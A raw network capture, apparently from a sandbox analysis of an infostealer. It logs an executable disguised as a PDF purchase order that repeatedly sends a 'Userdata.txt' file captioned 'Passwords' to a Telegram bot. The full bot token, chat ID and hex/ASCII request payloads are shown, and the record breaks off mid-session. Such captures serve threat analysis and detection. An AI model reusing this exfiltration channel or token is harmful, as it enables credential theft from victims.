{"ok":true,"result":{"message_id":13512,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402614,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49803	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:21 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1f3010ecdd81 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:21 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 33 30 31 30 65 63 64 64 38 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1f3010ecdd81Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:22 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:22 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13513,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402622,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49815	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:25 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1f5c280312c3 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:25 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 35 63 32 38 30 33 31 32 63 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1f5c280312c3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:25 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:25 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 32 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13515,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402625,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49827	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:30 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1f9130a6ddec Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:30 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 39 31 33 30 61 36 64 64 65 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1f9130a6ddecContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:30 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:30 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:30 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13516,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402630,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49839	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:34 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1fc089a266c5 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:34 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 63 30 38 39 61 32 36 36 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1fc089a266c5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:35 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:35 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:35 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13517,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402635,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49850	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:37 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1feba30ad185 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:37 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 65 62 61 33 30 61 64 31 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1feba30ad185Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:38 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:38 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13518,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402638,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49863	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:43 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd203aaca394ff Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:43 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 33 61 61 63 61 33 39 34 66 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd203aaca394ffContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:43 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:44 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 34 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13519,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402643,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49875	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:48 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd208b8ee19467 Host: api.telegram.org Content-Length: 1090
2024-12-17 02:30:48 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 38 62 38 65 65 31 39 34 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd208b8ee19467Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-17 02:30:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 02:30:48 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 02:30:48 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 32 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 30 32 36 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":13520,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734402648,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49885	149.154.167.220	443	7716	C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 02:30:51 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd20cb4a9bb649 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-17 02:30:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 30 63 62 34 61 39 62 62 36 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 